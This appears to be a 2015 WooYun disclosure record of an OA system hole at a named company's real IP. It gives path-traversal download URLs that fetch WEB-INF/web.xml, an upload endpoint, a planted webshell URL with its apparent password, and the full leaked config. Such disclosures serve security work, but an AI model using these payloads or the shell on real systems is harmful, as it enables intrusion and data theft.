乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-23: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向核心白帽子及相关领域专家公开 2015-11-12: 细节向普通白帽子公开 2015-11-22: 细节向实习白帽子公开 2015-12-07: 细节向公众公开
再次撸过~
OA系统上传地址:1.http://183.62.40.31/defaultroot/work_flow/formStartJSPUpload.jspOA系统下载地址:1.http://183.62.40.31/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x2.http://183.62.40.31/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x
shell地址:http://183.62.40.31/defaultroot/work_flow/mkzy.jsp heroes
文件下载了web.xml,可以把整站源码也下载下来
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd"><web-app> <display-name>defaultroot</display-name> <context-param> <param-name>weblogic.httpd.inputCharset./*</param-name> <param-value>UTF-8</param-value> </context-param> <filter> <filter-name>Set Character Encoding</filter-name> <filter-class>com.whir.common.util.SetCharacterEncodingFilter</filter-class> <init-param> <param-name>encoding</param-name> <param-value>UTF-8</param-value> </init-param> <init-param> <param-name>ignore</param-name> <param-value>true</param-value> </init-param> </filter> <!-- cas sso filter start --> <filter> <filter-name>CAS_Validation_Filter</filter-name> <filter-class>org.jasig.cas.client.validation.Cas20ProxyReceivingTicketValidationFilter</filter-class> <init-param> <param-name>casServerUrlPrefix</param-name> <param-value>https://uim.infinitus.com.cn</param-value> </init-param> <init-param> <!-- locale cas check address --> <param-name>service</param-name> <param-value>http://oa.infinitus.com.cn/defaultroot/SSOLoginAction.do</param-value> </init-param> <init-param> <param-name>redirectAfterValidation</param-name> <param-value>false</param-value> </init-param> </filter> <filter-mapping> <filter-name>CAS_Validation_Filter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <!-- cas sso filter end --> <filter-mapping> <filter-name>Set Character Encoding</filter-name> <servlet-name>action</servlet-name> </filter-mapping> <listener> <listener-class>com.whir.ezoffice.online.SystemListener</listener-class> </listener> <servlet> <servlet-name>action</servlet-name> <servlet-class>org.apache.struts.action.ActionServlet</servlet-class> <init-param> <param-name>config</param-name> <param-value> /WEB-INF/struts-config/archives-config.xml, /WEB-INF/struts-config/struts-config.xml, /WEB-INF/struts-config.xml, /WEB-INF/struts-config/organization-config.xml, /WEB-INF/struts-config/event-config.xml, /WEB-INF/struts-config/basedata-config.xml, /WEB-INF/struts-config/manager-config.xml, /WEB-INF/struts-config/group-config.xml, /WEB-INF/struts-config/user-config.xml, /WEB-INF/struts-config/right-config.xml, /WEB-INF/struts-config/role-config.xml, /WEB-INF/struts-config/security-config.xml, /WEB-INF/struts-config/forum-config.xml, /WEB-INF/struts-config/mailsetup-config.xml, /WEB-INF/struts-config/information-config.xml, /WEB-INF/struts-config/redhead-config.xml, /WEB-INF/struts-config/workflow-config.xml, /WEB-INF/struts-config/innermail-config.xml, /WEB-INF/struts-config/personalwork-config.xml, /WEB-INF/struts-config/subsidiarywork-config.xml, /WEB-INF/struts-config/workmanager-config.xml, /WEB-INF/struts-config/task-config.xml, /WEB-INF/struts-config/worklog-config.xml, /WEB-INF/struts-config/officemanager-config.xml, /WEB-INF/struts-config/menu-config.xml, /WEB-INF/struts-config/resource-config.xml, /WEB-INF/struts-config/systemnumber-config.xml, /WEB-INF/struts-config/booksmanager-config.xml, /WEB-INF/struts-config/voiture-config.xml, /WEB-INF/struts-config/boardroom-config.xml, /WEB-INF/struts-config/equipment-config.xml, /WEB-INF/struts-config/foregroundres-config.xml, /WEB-INF/struts-config/mobilemsg-config.xml, /WEB-INF/struts-config/govdocumentmanager-config.xml, /WEB-INF/struts-config/message-config.xml, /WEB-INF/struts-config/custom-config.xml, /WEB-INF/struts-config/customForm-config.xml, /WEB-INF/struts-config/customize-config.xml, /WEB-INF/struts-config/sitemanager-config.xml, /WEB-INF/struts-config/netdisk-config.xml, /WEB-INF/struts-config/aep-config.xml, /WEB-INF/struts-config/namecard-config.xml, /WEB-INF/struts-config/examination-config.xml, /WEB-INF/struts-config/press_config.xml, /WEB-INF/struts-config/dossier-config.xml, /WEB-INF/struts-config/projectmanager-config.xml, /WEB-INF/struts-config/govexchange-config.xml, /WEB-INF/struts-config/customizeCenter-config.xml, /WEB-INF/struts-config/workflowAnalysis-config.xml, /WEB-INF/struts-config/ldap-config.xml, /WEB-INF/struts-config/extension-config.xml, /WEB-INF/struts-config/wage-config.xml, /WEB-INF/struts-config/assessment-config.xml, /WEB-INF/struts-config/assunittest-config.xml, /WEB-INF/struts-config/performanceManager-config.xml, /WEB-INF/struts-config/hrm-config.xml, /WEB-INF/struts-config/systemremind-config.xml, /WEB-INF/struts-config/customdesktop-config.xml, /WEB-INF/struts-config/contract-config.xml, /WEB-INF/struts-config/hrm-kq-config.xml, /WEB-INF/struts-config/assetManager-config.xml, /WEB-INF/struts-config/Fax-config.xml, /WEB-INF/struts-config/ljj_transfer-config.xml, /WEB-INF/struts-config/ssologin-config.xml, /WEB-INF/struts-config/ljj_empshop-config.xml, /WEB-INF/struts-config/ljj_wenju-config.xml </param-value> </init-param> <init-param> <param-name>debug</param-name> <param-value>2</param-value> </init-param> <init-param> <param-name>convertNull</param-name> <param-value>true</param-value> </init-param> <init-param> <param-name>application</param-name> <param-value>ApplicationResources</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> <!-- <listener> <listener-class>com.whir.common.init.StartupServlet</listener-class> </listener>--> <servlet> <servlet-name>StartupServlet</servlet-name> <display-name>StartupServlet</display-name> <servlet-class>com.whir.common.init.StartupServlet</servlet-class> <load-on-startup>0</load-on-startup> </servlet> <servlet> <servlet-name>dwr-invoker</servlet-name> <display-name>DWR Servlet</display-name> <description>Direct Web Remoter Servlet</description> <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>true</param-value> </init-param> <init-param> <param-name>config-custmize</param-name> <param-value>/WEB-INF/dwr.xml</param-value> </init-param> </servlet> <servlet> <servlet-name>dwr-webform</servlet-name> <display-name>DWR Servlet</display-name> <description>Direct Web Remoter Servlet</description> <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>true</param-value> </init-param> <init-param> <param-name>config-webform</param-name> <param-value>/WEB-INF/form.xml</param-value> </init-param> </servlet> <servlet> <servlet-name>dwr-workflow</servlet-name> <display-name>DWR Servlet</display-name> <description>Direct Web Remoter Servlet</description> <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>true</param-value> </init-param> <init-param> <param-name>config-webform</param-name> <param-value>/WEB-INF/dwr_workflow.xml</param-value> </init-param> </servlet> <servlet> <servlet-name>GetRawFile</servlet-name> <servlet-class>com.whir.ezoffice.customdesktop.action.GetRawFile</servlet-class> </servlet> <servlet> <servlet-name>CustomDesktopAction</servlet-name> <servlet-class>com.whir.ezoffice.customdesktop.action.CustomDesktopAction</servlet-class> </servlet> <servlet> <servlet-name>TestChart</servlet-name> <servlet-class> com.whir.site.system.TestChart</servlet-class> </servlet> <servlet> <servlet-name> QuartzInitializer </servlet-name> <display-name> Quartz Initializer Servlet </display-name> <servlet-class> org.quartz.ee.servlet.QuartzInitializerServlet </servlet-class> <init-param> <param-name>config-file</param-name> <param-value>/quartz.properties</param-value> </init-param> <init-param> <param-name>shutdown-on-unload</param-name> <param-value>true</param-value> </init-param> <load-on-startup>2</load-on-startup> </servlet> <servlet> <servlet-name>ReportServlet</servlet-name> <display-name>ReportServlet</display-name> <description>ReportServlet</description> <servlet-class>com.whir.govezoffice.report.ReportServlet</servlet-class> </servlet> <servlet> <servlet-name>RegistryService</servlet-name> <servlet-class>com.whir.component.extds.RegistryService</servlet-class> <load-on-startup>3</load-on-startup> </servlet> <servlet> <servlet-name>DisplayChart</servlet-name> <servlet-class>org.jfree.chart.servlet.DisplayChart</servlet-class> </servlet> <servlet> <servlet-name>SOAPMonitorService</servlet-name> <display-name>SOAP Monitor Service</display-name> <servlet-class>org.apache.axis.monitor.SOAPMonitorService</servlet-class> <init-param> <param-name>SOAPMonitorPort</param-name> <param-value>5001</param-value> </init-param> <load-on-startup>100</load-on-startup> </servlet> <servlet> <servlet-name>AdminServlet</servlet-name> <display-name>Axis Admin Servlet</display-name> <servlet-class>org.apache.axis.transport.http.AdminServlet</servlet-class> <load-on-startup>100</load-on-startup> </servlet> <servlet> <servlet-name>AxisServlet</servlet-name> <display-name>Apache-Axis Servlet</display-name> <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class> </servlet> <servlet> <servlet-name>XFireServlet</servlet-name> <display-name>XFire Servlet</display-name> <servlet-class>org.codehaus.xfire.transport.http.XFireConfigurableServlet</servlet-class> </servlet> <servlet> <servlet-name>iWebRevisionServlet</servlet-name> <servlet-class>com.whir.integration.goldgrid.IWebRevisionServlet</servlet-class> </servlet> <servlet> <servlet-name>officeserverservlet</servlet-name> <servlet-class>com.whir.integration.goldgrid.OfficeServerServlet</servlet-class> </servlet> <servlet> <servlet-name>DepartmentServletAction</servlet-name> <servlet-class>com.whir.ezoffice.information.channelmanager.action.DepartmentServletAction</servlet-class> </servlet> <servlet> <servlet-name>WebBill</servlet-name> <servlet-class>WebBill</servlet-class> </servlet> <servlet> <servlet-name>PathFile</servlet-name> <servlet-class>PathFile</servlet-class> </servlet> <servlet> <servlet-name>RunReport</servlet-name> <servlet-class>RunReport</servlet-class> </servlet> <servlet> <servlet-name>ebfile</servlet-name> <servlet-class>ebfile</servlet-class> </servlet> <servlet-mapping> <servlet-name>WebBill</servlet-name> <url-pattern>/servlet/WebBill</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>PathFile</servlet-name> <url-pattern>/servlet/PathFile</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>RunReport</servlet-name> <url-pattern>/servlet/RunReport</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>ebfile</servlet-name> <url-pattern>/servlet/ebfile</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>officeserverservlet</servlet-name> <url-pattern>/officeserverservlet</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>iWebRevisionServlet</servlet-name> <url-pattern>/iWebRevisionServlet</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>DepartmentServletAction</servlet-name> <url-pattern>/DepartmentServletAction</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>DisplayChart</servlet-name> <url-pattern>/DisplayChart</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>ReportServlet</servlet-name> <url-pattern>/ReportServlet</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>action</servlet-name> <url-pattern>*.do</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>StartupServlet</servlet-name> <url-pattern>/StartupServlet</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>dwr-invoker</servlet-name> <url-pattern>/customize/dwr/*</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>dwr-webform</servlet-name> <url-pattern>/webform/dwr/*</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>dwr-workflow</servlet-name> <url-pattern>/workflow/dwr/*</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>GetRawFile</servlet-name> <url-pattern>/GetRawFile</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>CustomDesktopAction</servlet-name> <url-pattern>/CustomDesktopAction</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>TestChart</servlet-name> <url-pattern>/servlet/TestChart</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>SOAPMonitorService</servlet-name> <url-pattern>/SOAPMonitor</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>AdminServlet</servlet-name> <url-pattern>/servlet/AdminServlet</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>/servlet/AxisServlet</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>*.jws</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>/services/*</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>XFireServlet</servlet-name> <url-pattern>/xfservlet/XFireServlet/*</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>XFireServlet</servlet-name> <url-pattern>/xfservices/*</url-pattern> </servlet-mapping><session-config> <session-timeout>480</session-timeout> </session-config> <mime-mapping> <extension>wsdl</extension> <mime-type>text/xml</mime-type> </mime-mapping> <mime-mapping> <extension>xsd</extension> <mime-type>text/xml</mime-type> </mime-mapping><mime-mapping><extension>doc</extension><mime-type>application/msword</mime-type></mime-mapping><mime-mapping> <extension>xls</extension> <mime-type>application/msexcel</mime-type></mime-mapping><mime-mapping> <extension>ppt</extension> <mime-type>application/powerpoint</mime-type> </mime-mapping><mime-mapping> <extension>xml</extension> <mime-type>text/xml</mime-type> </mime-mapping> <mime-mapping> <extension>xsl</extension> <mime-type>text/xml</mime-type> </mime-mapping><welcome-file-list> <welcome-file>login.jsp</welcome-file> <welcome-file>index.wml</welcome-file> <welcome-file>index.html</welcome-file> <welcome-file>index.htm</welcome-file> <welcome-file>index.jsp</welcome-file></welcome-file-list><error-page> <error-code>404</error-code> <location>/errorShow404.jsp</location> </error-page> <error-page> <exception-type>java.lang.Exception</exception-type> <location>/errorShow.jsp</location> </error-page> <error-page> <error-code>500</error-code> <location>/errorShow.jsp</location> </error-page> <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-bean.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-bean.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-html.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-html.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-logic.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-logic.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-template.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-template.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-tiles.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-tiles.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/tag-lib/struts-nested.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/struts-nested.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/tag-lib/pager-taglib.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/pager-taglib.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/tag-lib/FCKeditor.tld</taglib-uri> <taglib-location>/WEB-INF/tag-lib/FCKeditor.tld</taglib-location> </taglib></web-app>
http://oa.infinitus.com.cn/defaultroot/SSOLoginAction.do
补吧
危害等级:中
漏洞Rank:5
确认时间:2015-10-23 09:46
内部已发现,已经让业务去整改了!谢谢白帽子!
暂无